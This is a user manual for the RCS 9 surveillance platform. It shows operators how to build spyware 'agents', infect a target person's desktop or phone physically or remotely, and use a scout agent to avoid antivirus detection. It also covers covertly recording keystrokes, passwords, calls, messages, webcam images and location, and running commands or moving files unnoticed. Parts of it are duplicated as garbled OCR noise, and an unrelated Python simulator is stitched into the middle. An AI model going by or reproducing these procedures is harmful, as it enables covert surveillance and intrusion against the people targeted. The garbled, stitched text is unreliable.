What you should know about targets
What is a target
A target is the physical person to be investigated. The Technician assigns one or more agents, desktop or mobile, to the target. Thus the agent can be installed on a computer or mobile phone.
Operation management
To manage operations: Operations section
Purpose
This function lets you:
• view and manage targets linked to an operation
NOTE: the function is only enabled if the user has Operation management authorization.
What the function looks like
This is what the page looks like:
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 22
[Screenshot: Operations section page]
Area Description
1 RCS menu.
2 Scroll bar.
3 Window toolbar.
4 List of created operations:
• Open operation. If targets were set and agents correctly installed, collected evidence is received.
• Closed operation. All targets are closed and agents uninstalled. All its targets and evidence can still be viewed.
5 Selected operation data.
6 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For a description of the data in this window see "Operation data" on the facing page.
For more information on operations see "What you should know about operations" on previous page.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 23
Viewing operation targets
To view operation targets:
Step Action
1 Double-click an operation: the target management page opens.
See "Operation page" below.
Operation data
Selected operation data is described below:
Data Description
Name: Operation name.
Description: User's description.
Contact: Descriptive field used to define, for example, the name of a contact person (Judge, Attorney, etc.).
Status: Operation status and close command:
• OPEN: the operation is open. If targets were set and agents correctly installed, the RCS receives the collected evidence.
• CLOSED: the operation is closed and cannot be re-opened. Agents no longer send data but evidence already received can still be viewed.
Groups: Groups that can see the operation.
Operation page
To view an operation: Operations section, double-click an operation
Purpose
This function lets you:
• manage factories which, once compiled, become agents to be installed on devices, see "Advanced factory or agent configuration" on page 59
What the function looks like
This is what the page looks like:
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 24
[Screenshot: Operation page]
Area Description
1 RCS menu.
2 Scroll bar.
3 Window toolbar. Descriptions are provided below:
Icon Function
• Create a factory.
NOTE: the function is only enabled if the user has Factory creation authorization. A factory can also be created on the target level, see "Operation page" on previous page.
4 Target list:
• Open target
• Closed target
5 Selected target data.
6 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 25
For more information on operations see "What you should know about operations" on page 22.
For more information on factories see "What you should know about factories and agents" on page 33.
For a description of the data in this window see "Operation page data" below.
To quickly manage operation data see "Wizards in the homepage" on page 13.
Creating a factory
To create a factory:
Step Action
1 • Click New Factory: data entry fields appear.
• Enter the name and description and in Type select the device type.
2 Click Save: the new factory with the selected name appears in the main work area.
Operation page data
Selected target data is described below:
Data Description
Name: Target name.
Description: User's description.
Status: Defines the target's status:
• Open. If the Technician correctly installs agents, RCS receives the collected evidence.
• Closed, it can no longer be opened.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 26
Targets
Presentation
Introduction
A target is a physical person to be monitored. Several agents can be used, one for each device owned by the target.
Content
This section includes the following topics:
Target page 28
Target page data 31
What you should know about factories and agents 33
Compiling a factory 35
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 27
Target page
To open a target: Operations section, double-click an operation, double-click a target
Purpose
This function lets you:
• manage factories which, when compiled, become agents to be installed on the target device.
• open a factory for basic configuration (see "Basic factory or agent configuration" on page 50) or advanced configuration (see "Advanced factory or agent configuration" on page 59)
• import target evidence
• open an installed agent
• update agent software
What the function looks like
This is what the page looks like:
[Screenshot: Target page]
Area Description
1 RCS menu.
Technician's Guide ver.1.5 RCS 9 © 2013 HT - pag. 28
RC5 9 - Target page
Target page
To open a target Operations section, double-click an operation, double-click a target
Purpose
This function lets vou:
. manage factories which, when compiled, become agents to be installed on the target
device.
. open a factorv for basic configuration (see "Basic factory or agent configuration" on page
50) or advanced configuration (see dvancedfactory or agent configuration" on page
59
.- import target evidence
. open an installed agent
. update agent software
What the function looks like
This is what the page looks like:
.-
Inf-?ll
nun-am '3
?aunt-.1? a
. . .4.
aux--.. -.
1 El
..- Ialall': pox. .- -:
Ctr-.1 . I'll"
in "rum 11-11
The
LU
km 31.1:
mun.
.DIPEI:
[Jill
EHJIICH
ram.th u-
Dino.-
harm
a - - L- In
Area Description
1 RES menu.
Technician's Guide ver.1.5 RC3 9 201313} - pag. 23
RC5 9 - What the function looks like
Area Description
2 Scroll bar.
3 Window toolbar. Descriptions are provided below:
NOTE: the key displays elements in a list with their data.
Icon Function
Create a factory.
NOTE: the function is only enabled if the user has Factory creation authorization. A factory can also be created on the operation level, see "Operation page" on page 24.
Editing a factory or agent.
Deleting a factory or agent.
Closing the agent or factory.
Moving the factory or agent to a new target.
Update all agents' software to the last version received from HackingTeam support service.
CAUTION: the update does not update the configuration that is transmitted to the agent at the next synchronization.
IMPORTANT: for Android, root privileges must be obtained to update the agent. See "What you should know about Android" on page 139.
Import target evidence physically collected on the device.
NOTE: the function is only enabled if the user has Import evidence authorization.
Area Description
4 Icons/list of created factories and installed agents.
[icon]: agent in demo mode.
[icon]: scout agent awaiting verification.
5 Selected factory or agent data.
6 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For a description of the data in this window see "Target page data" on the facing page.
For more information on targets see "What you should know about factories and agents" on page 33.
To quickly manage target data, see "Wizards in the homepage" on page 13.
Creating a factory
To create a factory:
Step Action
1 • Click New Factory: data entry fields appear.
• Enter the name and description and in Type select the device type.
2 Click Save: the new factory with the selected name appears in the main work area.
Closing a factory or agent
To close a factory or agent:
Step Action
1 Select a factory or agent and click Close.
2 Confirm close.
CAUTION: closing an agent is irreversible and the agent is uninstalled at the next synchronization. Closing a factory makes it inaccessible. Active agents remain accessible, while agents that have not been synchronized at least once before the factory is closed will be uninstalled.
Deleting a factory or agent
To delete a factory or agent:
Step Action
1 Select a factory or agent and click Delete.
2 Confirm the action: logs, settings and evidence are deleted.
CAUTION: this operation is irreversible.
Importing target evidence
To import evidence:
Step Action
1 • Click Import Evidence: the import window opens.
• Click Select Directory and select the folder where the offline.ini file is saved.
2 Click Import: evidence is saved in the database and is available to be viewed by
Target page data
To view page data: Operations section, double-click an operation, double-click a target, click Icon view or Table view
Page elements can be viewed as icons or a table.
Icon view
Icons are described below:
Data Description
[icon] Desktop and mobile type factory in Open status.
[icon] Desktop agent types, in Open status, for operating systems: OS X, Windows
Data Description
[icon] Mobile agent types, in Open status, for operating systems: Android, BlackBerry, Symbian, Windows Mobile
NOTE: icons are light grey for CLOSED factories and agents. This is the icon for a mobile agent for Android in Closed status: [icon].
NOTE: the scout agent displays a compass next to the device icon. This icon is a Windows desktop scout agent: [icon].
Table view
Data is described below:
Data Description
Name Factory or agent name.
Description Factory or agent description.
Status Open: an open factory can be compiled to create agents. An open agent can be installed, is running and records evidence.
Closed: a closed factory or agent cannot be reopened. Data in RCS can still be viewed.
Type Desktop or mobile type.
Platform (agent only) Operating system on which the agent is installed.
Version (agent only) Agent version. A new version is created when a new configuration is created.
Last (agent only) Date and time of the last agent synchronization.
Data Description
Ident (agent only) Univocal agent identification.
Instance (agent only) Univocal identification of the device where the agent is installed.
What you should know about factories and agents
Infection methods
A device can be infected via:
• physical infection: the device is infected by the execution of a file transmitted using USB memories, CDs or documents. Evidence can be collected physically or via Internet as soon as the device connects.
• remote infection: the device is infected by the execution of a file transferred via Internet connection or made available in a Web resource. Evidence can be collected physically or via Internet as soon as the device connects. Remote infection can be enhanced using Network Injector.
Infection strategy components
Components needed for correct infection include:
• Factory: agent model.
• Installation vectors: infection channels.
• Agent: the software to be installed on the target device.
• Target and operation: defined when investigations are opened by the System Administrator. Refer to the System Administrator Manual.
• Evidence: the types of recordings to be collected.
Factories
The factory is a model to be used to create agents to be installed. The icon varies according to the type of device intended for the agent:
• [icon]: factory for desktop agent
• [icon]: factory for mobile agent
The following must be set in the factory:
• data to be acquired (basic configuration) or modules to be dynamically activated (advanced configuration)
• installation vectors (CD, exploit, Network Injector)
Tip: a configuration can be saved as a template to load it the next time you create a similar agent.
Tip: a factory can be used to create several agents: for example, to be installed via different installation vectors on two computers with different operating systems.
How to create factories
Factories are templates that can be created on two different operation-target-agent hierarchical levels:
• on the operation level: the factory, after installation and first synchronization, automatically creates an agent and target for each device
• on the target level: the factory, after installation and first synchronization, automatically creates an agent for that target
The operation level mode ensures that collected evidence is assigned separately. In fact, it creates as many agents as there are devices. Later, if two or more devices belong to the same target, the agent can be moved to the right target.
The target level mode, if incorrectly used, may create a factory which is used to create several agents.
Installation vectors
Installation vectors are selected when compiling and define the installation method, physical or remote, for an agent. When compiling, available installation vectors may vary according to the device's operating system.
Several installation vectors can be used for the same agent.
NOTE: injection rules are used for injection on HTTP connections. See "Managing the Network Injector" on page 6?
Agents
An agent is the result of compiling a factory with one or more installation vectors. An agent is ready to be installed on a device.
Basic configuration defines the type of data to be acquired, while advanced configuration lets you dynamically and independently activate or deactivate modules.
For the types of modules available in basic and advanced configurations see "Module list" on page 122.
For more information on agents see "What you should know about agents" on page 39.
Data acquisition modules
Modules trigger some activities on the target device, mainly data acquisition. They are enabled and set in the basic configuration (only some) or in the advanced configuration.
Available module types also depend on the device type.
For the complete list see "Module list" on page 122.
Compiling a factory
To compile a factory: Operations section, double-click an operation, double-click a target, double-click a factory, click Build
or: Operations section, double-click an operation, double-click a target, double-click a factory, click Advanced Config, Build
Purpose
This function lets you create one or more agents (for production use or to be tested in demo) depending on the chosen installation vectors and target platforms.
NOTE: for a detailed description of each installation vector see "List of installation vectors" on page 138.
NOTE: the function is only enabled if the user has Installation vector creation authorization.
Next steps
Creating an agent implies the subsequent installation on a target device.
What the function looks like
This is how the page is displayed for a desktop agent:
[Screenshot: "Build an Agent from a Factory" window. The vector tree lists entries such as Offline Installation, Exploit, Network Injection and Demo Mode; the settings area for the selected vector shows options such as "Require Administrative Privilege" and "Application to be used as dropper".]
Area Description
1 Installation vector and platform search box.
2 Vector and platform tree view.
3 Compiling settings area for the chosen vector.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For more information on factories see "What you should know about factories and agents" on page 33.
For a detailed description of each installation vector see "List of installation vectors" on page 138.
Creating an agent
To create an agent:
Step Action
1 Select one or more installation vectors and set the options.
2 Click Create: a ZIP or ISO file is created and downloaded in the RCS Download folder, ready to be installed on the device.
Creating an agent to be tested in demo mode
IMPORTANT: use this option for tests on internal devices. Agents in demo mode are not invisible and RCS installation is not hidden.
To create an agent for test purposes:
Step Action
1 Select one or more installation vectors and set the options.
2 Select the Demo combo box.
3 Click Create: the agent installed on the device will show its presence with audio signals and on-screen messages.
Agents
Introduction
Agents acquire data from the device on which they are installed and send it to the RCS Collectors. Their configuration and software can be updated and they can transfer files unnoticed to the target.
Content
This section includes the following topics:
What you should know about agents . . . 39
Agent page . . . 41
Agent configuration log data . . . 43
Agent event log data . . . 44
Agent log data . . . 44
Command page . . . 44
Transferring files to/from a target . . . 45
What you should know about agents
Agent installation
The agent can be exposed and identified if installed in environments with antivirus or in environments managed by expert technicians.
To prevent this from happening, a substitute, the scout agent, is sent at installation to infect the target device and check the environment.
Once installed, the scout agent appears in the target page after the first synchronization. Its icon, similar to the agent one, indicates the platform where it is installed. For example:
• [icon]: scout agent installed on a Windows device
• [icon]: scout agent installed on a BlackBerry device
Evidence acquisition for installation environment analysis
After installation is completed, the scout agent acquires evidence:
• Screenshot type, to help identify the target device
• Device type, to help understand whether the environment to be infected is ok or whether there are applications that could compromise agent integrity.
IMPORTANT: Screenshot type evidence is only collected if the module is enabled in the configuration. If necessary, remember to enable it before sending the agent.
Installation environment analysis
After the scout agent acquires evidence, it must be checked to decide whether the installation environment is safe for the agent.
If the environment is safe, the agent can be updated: the scout agent is replaced by the agent.
If the environment is not safe, the scout agent must be closed.
Updating the scout agent
Updating the scout agent installs the agent, and the scout agent icon is replaced by the agent icon in the target page.
• [icon]: agent installed on a Windows device
• [icon]: agent installed on a BlackBerry device
Agent synchronization
An agent will perform synchronization only if:
• synchronization is enabled in the basic configuration
• a synchronization type action was added to the advanced configuration.
Offline and online agents
An agent behaves differently according to the Internet connection availability:
Internet connection not available: if the agent has modules enabled, it starts to record data on the device.
Internet connection available: if the first synchronization has been run on the agent, you can:
• change settings, for example, as recording requests become more specific for that device. Resetting an agent does not change factory settings.
• update its software,
• transfer files to and from the device,
• analyze sent evidence.
Tip: start creating an agent and only enable synchronization and the device module. Then, once installed, and upon receiving the first synchronization, gradually enable the other modules, according to the device capabilities and the type of evidence you want to collect.
Temporarily disabling an agent
Agent activities can be temporarily suspended without uninstalling the agent by simply disabling all the modules and leaving only synchronization active.
Agent testing
To test a configuration before production use, create an agent in Demo mode (see "Compiling a factory" on page 35).
The agent is created in demo mode, behaving according to the given configuration, with the sole difference that it clearly signals its presence on the device (with audio, LED and screen messages).
Signaling permits easy identification of an infected device used for testing.
NOTE: in case evidence is not received from an agent in demo mode, this may be due to a server settings error or to the impossibility of reaching the address of the set Collector (due to network settings problems).
Agent configuration
An agent configuration (basic or advanced) can be repeatedly edited. When saved, a copy of the configuration is created and saved in the configuration log.
At the next synchronization the agent will receive the new configuration (Sent time) and communicate successful installation (Activated). From that point on, any changes can only be made by saving a new configuration.
NOTE: if Sent time and Activated are null, the current settings can still be edited.
For a description of agent configuration log data see "Agent configuration log data" on page 43.
Agent page
To manage agents: Operations section, double-click an operation, double-click a target, double-click an agent
Purpose
This function lets you:
• check the agent configuration log and view details for each configuration.
• transfer files to/from the target device
• import/export agent evidence
• replace the scout agent with an agent and update the agent's software
• display commands run by the agent
• display the IP addresses used by the agent to contact the Collector
What the function looks like
This is what the page looks like:
Technician's Guide ver.1.5 RC3 9 201313 - pag. 41
[Screenshot: Agent page, with numbered areas]
Area Description
1 RCS menu.
2 Scroll bar.
3 Window toolbar. Descriptions are provided below:
Icon Description
(icon) Send the agent to the scout agent or update the agent software with the last version received from HackingTeam.
CAUTION: the update does not update the configuration that is transmitted to the agent at the next synchronization.
IMPORTANT: for Android, root privileges must be obtained to update the agent. See "What you should know about Android" on page 139.
(icon) Delete evidence on the device not yet transmitted to RCS.
Parameters:
• Date before: delete evidence saved before the set date.
• Size bigger than: delete evidence larger than the set size.
Area Description
4 Possible actions on the agent. Descriptions are provided below:
Icon Description
(icon) Show the agent settings log, allowing the existent settings to be edited and saved as new. See "Agent configuration log data" below.
(icon) Show the agent event log (info). See "Agent event log data" on the facing page.
(icon) Show the results of commands run on the device using Execute actions. See "Command page" on the facing page.
(icon) Show the agent synchronization log. See "Agent synchronization log data" on the facing page.
(icon) Open the function to upload or download files from the target device. See "Transferring files to/from a target" on page 46.
5 Agent details.
6 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For more information on agents see "What you should know about agents" on page 39.
Agent configuration log data
Descriptions are provided below:
Field Description
Description - User's description of the settings.
User - Name of the user who created the configuration.
Saved - Date settings were saved.
Sent time - Date settings were sent via synchronization.
WARNING: if this value is null, the agent has not yet received the configuration.
Activated - New agent configuration installation date.
Agent event log data
Descriptions are provided below:
Field Description
Acquired - Date/time of the event acquired on the device. It can be filtered. Last 24 hours is set by default.
Received - Date/time of the event logged in RCS. It can be filtered. Last 24 hours is set by default.
Content - Status information sent by the agent.
Agent synchronization log data
Descriptions are provided below:
Field Description
Acquired - Synchronization date/time. It can be filtered. Last 24 hours is set by default.
IP - IP address used for synchronization.
Address - Site where the connection was established.
Command page
To manage command results: Operations section, double-click an operation, double-click a target, double-click an agent, double-click Commands.
Purpose
This function lets you:
• check the results of commands run with the Execute action set on the agent
• check executable file results run during file transfer to/from the agent
• run one or more commands on an agent
What the function looks like
This is what the page looks like:
[Screenshot: Command page, with numbered areas]
Area Description
1 RCS menu.
2 Scroll bar.
3 Window toolbar. Descriptions are provided below:
Icon Description
(icon) Export the selected command to a .txt file.
(icon) Show selected command details.
(icon) Open a window to enter one or more command strings. All commands are sent to the agent at the next synchronization and the results are displayed at the next receipt.
NOTE: the function is only enabled if the user has Command execution on agents authorization.
Area Description
4 Command list based on set filters.
5 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
Transferring files to/from a target
To transfer files to/from the agent: Operations section, double-click an operation, double-click a target, double-click an agent, double-click File Transfer.
Purpose
Uploading and downloading files on the device where the agent is installed.
What the function looks like
This is what the file transfer to/from target function looks like:
[Screenshot: File Transfer page, with numbered areas]
Area Description
1 RCS menu.
2 Operation scroll bar.
Area Description
3 Window toolbar. Descriptions are provided below:
Icon Description
(icon) Upload a file to the device, in the folder where the agent is installed. Each successful upload is logged with the date-time and file name.
NOTE: the function is only enabled if the user has Upload files to agent authorization.
(icon) Load an executable file in the device folder where the agent is installed and run it (using Execute). Execution results appear in the Commands page. See "Command page" on page 44.
Each successful upload is logged with the date-time and file name.
IMPORTANT: this function can be inhibited if the user does not have the relevant permissions or if not permitted by the user license.
(icon) Export upload log.
(icon) Delete the selected upload. Any deleted command results are saved.
4 Upload log, with toolbar.
5 Window toolbar. Descriptions are provided below:
Icon Description
(icon) Download a file from the device. The path and file name must be indicated. Each successful download is logged with the file name complete with path. The file is saved in the RCS Download folder on the desktop.
(icon) Delete the selected file from the RCS Download folder.
Area Description
6 Download log, with toolbar.
7 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For a description of agent data see "Agent page" on page 41.
Factory and agent: basic configuration
Presentation
Introduction
The basic configuration lets you add data acquisition and simple command execution modules that do not require complex settings.
Content
This section includes the following topics:
What you should know about basic configuration 50
Basic factory or agent configuration 50
Basic configuration data 53
What you should know about basic configuration
Basic configuration
The basic factory/agent configuration lets you enable and quickly set evidence acquisition.
Basic configuration does not include the acquisition of some types of evidence nor detailed acquisition method options.
Default basic configuration:
• System information acquisition when the device is turned on (cannot be disabled)
• A synchronization module to run between the agent and RCS at a certain interval.
For the list of module types available in the basic configuration see "Basic configuration data" on page 53.
When returning from advanced configuration to basic configuration, the advanced configuration will be lost and the default basic configuration will be restored.
Exporting and importing configuration settings
Base or advanced configuration settings are exported/imported to reuse the settings on other RCS systems.
The base or advanced configuration settings are exported in a .json file that can be transferred to another system and imported when creating an agent.
Saving the configuration settings as a template
Base or advanced configuration settings are saved as a template to have other users on the same RCS system reuse the configuration.
The base or advanced configuration settings are saved as a template in the database, accompanied by a description and the name of the user. When creating another target, another user can load it and thus it becomes the configuration for that agent.
IMPORTANT: base and advanced configuration templates are saved separately in the database. Base configuration templates thus appear when creating an agent with a base configuration, advanced configuration templates appear when creating an agent with an advanced configuration.
Basic factory or agent configuration
To set factories: Operations section, double-click an operation, double-click a target, double-click a factory.
To set agents: Operations section, double-click an operation, double-click a target, double-click an agent.
Purpose
This function lets you:
• set the factory/agent configuration indicating whether online synchronization is required and the data to be acquired
• open the factory compiling function (see "Compiling a factory" on page 35)
• open the advanced configuration function (see "Advanced factory or agent configuration" on page 59)
NOTE: the function is only enabled if the user has Agent configuration authorization.
Next steps
After setting a factory configuration, it must be compiled to obtain an agent.
After editing the agent configuration, simply save it. If the agent is online, the new configuration will be applied at the next synchronization. Otherwise, physical installation is required.
What the function looks like
This is what the page looks like:
[Screenshot: basic configuration page, with numbered areas]
Area Description
1 RCS menu.
2
Area Description
3 Window toolbar. Descriptions are provided below:
Icon Description
(icon) Compile the configuration into one or more agents to be installed, based on selected installation vectors. See "Compiling a factory" on page 35.
(icon) Save the configuration: the agent configuration is logged and sent to the agent at the next synchronization. See "Agent configuration log data" on page 43.
(icon) Export the configuration to a .json file.
(icon) Import the configuration from a .json file.
(icon) Load the basic configuration template or save the current configuration as a template. See "What you should know about basic configuration" on page 50.
(icon) Open the advanced configuration window. See "Advanced factory or agent configuration" on page 59.
When returning from advanced configuration to basic configuration, the advanced configuration will be lost and the basic configuration will be restored.
4 List of collectable evidence and relevant activation status.
NOTE: the module list varies according to device type.
5 RCS status bar.
To learn more
For interface element descriptions see "Shared interface elements and actions" on page 14.
For more information on the basic configuration see "What you should know about basic configuration" on page 50.
For a description of the data in this window see "Basic configuration data" on the facing page.
For the list of modules available in the two configurations see "Module list" on page 12.?
Setting a factory or agent configuration
To activate or deactivate collectable evidence:
Step Action
1 Click OFF for the evidence to be acquired: the button turns to ON and configuration options, where available, may be set.
2 In Online synchronization leave ON if the target device can access the Internet. This lets you gradually set options. Leave OFF if the target device cannot access the Internet or if you want to manually acquire evidence from the target.
3 Click Save to save the current configuration.
4 Continue differently:
if you are setting a factory: click Build to compile it and obtain the agents for the different platforms. See "Compiling a factory" on page 35.
if you are setting an agent: agent settings are automatically updated at the next synchronization.
Basic configuration data
The types of collectable evidence that can be enabled in basic factory or agent configuration are listed below.
Recording Description
Calls - Record calls.
Messages - Record messages.
Accessed files - Record documents or images opened by the target. Document, Images: file types.
Screenshots - Record windows opened on the target display. Grab a screenshot every: image acquisition interval.
Position (desktop only) - Log the target's geographic position. Save target position every: position acquisition interval.
Recording Description
Contacts & Calendar - Record contacts and calendar.
Visited websites - Record visited website URL addresses.
Keylog (mobile only) - Log key strokes.
Keylog, Mouse & Password (desktop only) - Log key strokes, passwords saved on the system and mouse clicks.
Camera - Record webcam images. Grab a shot every: image acquisition interval. …: acquisition repetitions.
Online synchronization - Enabled by default. If enabled, the agent contacts the server to send data and receives new configurations, updates, and so on. Every: interval in minutes. … on: Anonymizer or Collector name or IP address. The name or IP address can be manually entered.
7
Factory and agent: advanced configuration
Presentation
Introduction
Advanced configuration lets you set advanced configuration options. Other than enabling collectable evidence, events can be linked to actions, to trigger specific agent reactions to changing conditions on the device (e.g., the device screensaver is started). Actions can start or stop modules and enable or disable other events. Furthermore, all the event, action and module options can be individually set.
Content
This section includes the following topics:
What you should know about advanced configuration 56
Advanced factory or agent configuration 59
Global agent data 63
What you should know about advanced configuration
Advanced configuration
Advanced factory/agent configuration lets you create complex activation sequences using a simple graphic interface.
The purpose of the sequence is to start evidence collection, and/or run an action when an event occurs.
Advanced configuration always includes two basic sequences:
• At each … (Loop event), acquire device information (Start module action, Device module)
• At the end of the interval (Timer-Loop event), run synchronization between the agent and RCS (synchronization action)
Following is an image that illustrates the two basic sequences recommended for remote data acquisition:
[Screenshot: the two default sequences in the advanced configuration editor]
NOTE: these two basic sequences are set by default and recommended for minimum agent operations.
Advanced configuration components
Advanced configuration components are:
RC5 9 - Reading sequences
• events that trigger an action (e.g., a call is received on the device)
• actions run when an event occurs (e.g., start recording the call)
• sub-actions run when an event occurs (e.g., a hidden SMS sent with the device position)
• modules which, enabled by an action, start collecting the desired evidence or trigger other
actions on the device (e.g., record call audio)
• sequences, used to indicate a group of events, actions, sub-actions and modules.
NOTE: some event, action and module options are only available in advanced
configuration.
Reading sequences
Complex sequences can be read as follows:
• when the device is connected to the power source (event)
• send an SMS (sub-action)
• log the position (action that triggers a module)
• disable the event occurring when the SIM is changed (action that disables an event)
• and so on
Possible event, action, sub-action and module combinations are infinite. Following is a detailed
explanation of correct design rules.
Events
Events are monitored by the agent and can start, repeat or end an action.
NOTE: a module cannot be directly started by an event.
For example, a Window event (window opened on the device) can trigger an action. The action
will then start a module.
Various types of events are available. For the full list see "Event list" on page 112.
The relation between an event and one or more actions is represented by a connector:
Relation between events and actions    Description
Start    Start an action when the event occurs.
Repeat    Repeat an action. The interval and number of repetitions can be specified.
End    Start an action when the event is over.
NOTE: an event can manage up to three distinct actions simultaneously. The Start action is
started when an event occurs on the device (e.g., the Standby event triggers Start when the
device enters standby mode). The Repeat action is triggered at the set interval for the
entire duration of the event. The Stop action is started when the event is over (e.g., the
Standby event triggers End when the device exits standby mode).
Actions
Actions are triggered when an event occurs. They can:
• start or stop a module
• enable or disable an event
• run a sub-action
For example, an action (empty) can disable the Process event (start a system process) that
triggered it and enable the Position module (log the GPS position). If necessary, the action can
also run an SMS sub-action (send a message to a specified phone number).
Various sub-actions are available and can be combined without restrictions (e.g., run a command,
create an Alert message). For the full list see "List of sub-actions" on page 105.
Relations between actions and modules
An action can influence a module in different ways. The relation between an action and one or
more modules is represented by a connector:
Relation between actions and modules    Description
Start modules    Start a module.
Stop modules    Stop a module.
An action can start/stop several modules simultaneously.
Relations between actions and events
The relation between an action and one or more events is represented by a connector:
Relation between actions and events    Description
Enable events    Enable an event.
Disable events    Disable an event.
NOTE: an action can enable/disable several events simultaneously.
Modules
Each module enables the collection of a specific type of evidence from the target device. They can be
started/stopped by an action and produce evidence.
For example, a Position module (log the GPS position) can be started by an action triggered by a
Call event (a call was made/received).
Various modules are available that can be started/stopped (e.g., start position module, stop
screenshot module). For the complete list see "Module list" on page 122.
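The design rules above (an event reaches an action only through its Start, Repeat or End connector; only an action starts or stops modules or enables or disables events; a module is never started directly by an event) are easy to misread when tracing a sequence by hand. The following is an added example for an analyst reading such sequences, not RCS code and not its .json format: it enforces those rules and traces what firing an event does. Class and method names are assumptions; the Standby and Process events, the Position and Screenshot modules and the SMS sub-action are the ones the text mentions.

```python
from dataclasses import dataclass, field

# Design rules stated in the guide: an event reaches at most three actions, one per
# connector; an action acts on modules and events; a module is never started by an event.
EVENT_CONNECTORS = ("Start", "Repeat", "End")
ACTION_CONNECTORS = ("Start modules", "Stop modules", "Enable events", "Disable events")


@dataclass
class Event:
    name: str
    enabled: bool = True
    links: dict = field(default_factory=dict)   # connector -> action name


@dataclass
class Action:
    name: str
    subactions: list = field(default_factory=list)   # e.g. "SMS", "Alert"
    links: dict = field(default_factory=lambda: {c: set() for c in ACTION_CONNECTORS})


class Sequence:
    """Constructed model of one advanced configuration (hypothetical class, not RCS code)."""

    def __init__(self):
        self.events = {}
        self.actions = {}
        self.modules = {}   # module name -> running?

    def add_event(self, name, enabled=True):
        self.events[name] = Event(name, enabled)

    def add_action(self, name, subactions=()):
        self.actions[name] = Action(name, list(subactions))

    def add_module(self, name):
        self.modules[name] = False

    def link_event(self, event, connector, action):
        """Event -> action. Rejects anything else: a module cannot be started by an event."""
        if connector not in EVENT_CONNECTORS:
            raise ValueError(f"unknown event connector {connector!r}")
        if action not in self.actions:
            raise ValueError(f"{action!r} is not an action; events can only trigger actions")
        self.events[event].links[connector] = action

    def link_action(self, action, connector, target):
        """Action -> module (start/stop) or action -> event (enable/disable)."""
        if connector not in ACTION_CONNECTORS:
            raise ValueError(f"unknown action connector {connector!r}")
        pool = self.modules if connector.endswith("modules") else self.events
        if target not in pool:
            raise ValueError(f"{target!r} is not a valid target for {connector!r}")
        self.actions[action].links[connector].add(target)

    def fire(self, event, connector):
        """Simulate the event reaching one connector; return the trace of what the action did."""
        ev = self.events[event]
        if not ev.enabled or connector not in ev.links:
            return []                      # disabled events and unlinked connectors do nothing
        act = self.actions[ev.links[connector]]
        trace = [f"{event}:{connector} -> {act.name}"]
        trace += [f"sub-action {s}" for s in act.subactions]
        for mod in sorted(act.links["Start modules"]):
            self.modules[mod] = True
            trace.append(f"start module {mod}")
        for mod in sorted(act.links["Stop modules"]):
            self.modules[mod] = False
            trace.append(f"stop module {mod}")
        for ev_name in sorted(act.links["Enable events"]):
            self.events[ev_name].enabled = True
            trace.append(f"enable event {ev_name}")
        for ev_name in sorted(act.links["Disable events"]):
            self.events[ev_name].enabled = False
            trace.append(f"disable event {ev_name}")
        return trace


def build_demo():
    """Two sequences from the text: Standby Start/End around a module, and an action that
    disables the Process event that triggered it (names constructed from the guide)."""
    seq = Sequence()
    for mod in ("Position", "Screenshot"):
        seq.add_module(mod)
    seq.add_event("Standby")
    seq.add_event("Process")
    seq.add_action("standby_on")
    seq.add_action("standby_off")
    seq.add_action("on_process", subactions=["SMS"])
    seq.link_event("Standby", "Start", "standby_on")
    seq.link_action("standby_on", "Start modules", "Screenshot")
    seq.link_event("Standby", "End", "standby_off")
    seq.link_action("standby_off", "Stop modules", "Screenshot")
    seq.link_event("Process", "Start", "on_process")
    seq.link_action("on_process", "Start modules", "Position")
    seq.link_action("on_process", "Disable events", "Process")   # disables its own trigger
    return seq


if __name__ == "__main__":
    demo = build_demo()
    for step in (("Process", "Start"), ("Process", "Start"), ("Standby", "Start"), ("Standby", "End")):
        print(step, demo.fire(*step))
```

Firing Process a second time returns an empty trace because the first firing disabled its own event, which is exactly the self-disabling pattern the Actions paragraph describes.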
Exporting and importing configuration settings
Base or advanced configuration settings are exported/imported to reuse the settings on other RCS
systems.
The base or advanced configuration settings are exported in a .json file that can be transferred to
another system and imported when creating an agent.
Saving the configuration settings as a template
Base or advanced configuration settings are saved as a template to let other users on the same
RCS system reuse the configuration.
The base or advanced configuration settings are saved as a template in the database,
accompanied by a description and the name of the user. When creating another target, another
user can load it and thus it becomes the configuration for that agent.
IMPORTANT: base and advanced configuration templates are saved separately in the
database. Base configuration templates thus appear when creating an agent with a
base configuration, advanced configuration templates appear when creating an agent
with an advanced configuration.
Advanced factory or agent configuration
To open advanced configuration:
- Operations section, double-click an operation, double-click a target, double-click a factory,
click Advanced Config
- Operations section, double-click an operation, double-click a target, double-click an agent,
click Advanced Config
Purpose
This function lets you:
• create module activation sequences triggered by events occurring on the target device.
Each sequence can be made up of one or more sub-actions.
• set general factory/agent configuration options.
NOTE: the function is only enabled if the user has Agent configuration authorization.
CAUTION: when returning from advanced configuration to basic configuration, the
advanced configuration will be lost and the default basic configuration will be restored.
Next steps
For a factory, after completing its configuration, compile it to obtain the agent to be installed. See
"Compiling a factory" on page 35.
For an agent, after completing its configuration, simply save the new configuration. At the next
synchronization the new configuration will be sent to the agent.
What the function looks like
This is what the page looks like:
[Figure: advanced configuration page, with numbered areas described below]
Area    Description
1    RCS menu.
2    Scroll bar.
3    Window toolbar. The toolbar icons (not reproduced here) are described below:
- Compile the configuration into one or more agents, based on selected installation
vectors. See "Compiling a factory" on page 35.
- Save the current configuration.
- Export the configuration to a .json file.
- Import the configuration from a .json file.
- Load the advanced configuration template or save the current configuration as a
template. See "What you should know about advanced configuration" on page 56.
- Add an event.
- Add an action.
- Edit the selected event or action.
- Delete the selected event, action or logical connection.
- Edit global agent data, see "Global agent data" on page 63.
CAUTION: settings are lost when you return to the basic configuration.
- Shrink or expand event or action widgets to provide a better view of current settings.
